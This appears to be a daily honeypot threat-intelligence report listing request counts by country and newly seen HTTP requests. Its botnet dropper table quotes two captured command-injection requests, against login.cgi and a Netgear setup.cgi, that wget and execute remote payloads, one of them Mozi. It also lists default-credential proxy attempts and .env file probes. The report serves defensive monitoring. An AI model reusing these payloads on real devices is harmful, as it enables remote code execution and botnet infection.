Skip to main content
  1. Daily-Posts/

Report: 2025-08-25

·314 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-25
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 13 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2676 requests were recorded during the day, originating from 2 different countries, with a peak of 2318 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
GBDubai
GBDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
201.103.192.43GET /login.cgi?cli=aa%20aa%27;wget%20http://46.36.37.3/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
59.88.37.97GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.88.37.97:59512/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
134CONNECT 206.123.145.21:80 HTTP/1.0
11331\x04\x01\x00P\xC4\xFBG\x8F\x00
11341CONNECT 196.251.71.143:80 HTTP/1.0
11661\x04\x01\x00P\xCE{\x91\x15root:r00t\x00
11671\x04\x01\x00P\xCE{\x91\x15config:config\x00
11681\x04\x01\x00P\xCE{\x91\x15admin:1234\x00
11691\x04\x01\x00P\xCE{\x91\x15fwupgrade:CxVn1geRkJQq0yUc\x00
11841GET /VHnP HTTP/1.1
11851GET /mbGG HTTP/1.1
12241GET /.env-test-stage HTTP/1.1
12251GET /.env.local.dist HTTP/1.1
12271GET /.env-test-suite HTTP/1.1
12281GET /.env.live.local HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
02318GB
1136US
276BG
329DE
422SC
519HK
614NL
711CA
86SG
96IN
106CN
114RU
123BR
133ZA
143BE
152VN
162AU
172KR
182FR
191AZ
201AM
211IR
221JP
231AT
241MX
251MC
261TH
271TW
281ID
291BD
301UA

Related

Report: 2025-08-24
·992 words
Repport Daily
Report: 2025-08-23
·474 words
Repport Daily
Report: 2025-08-22
·397 words
Repport Daily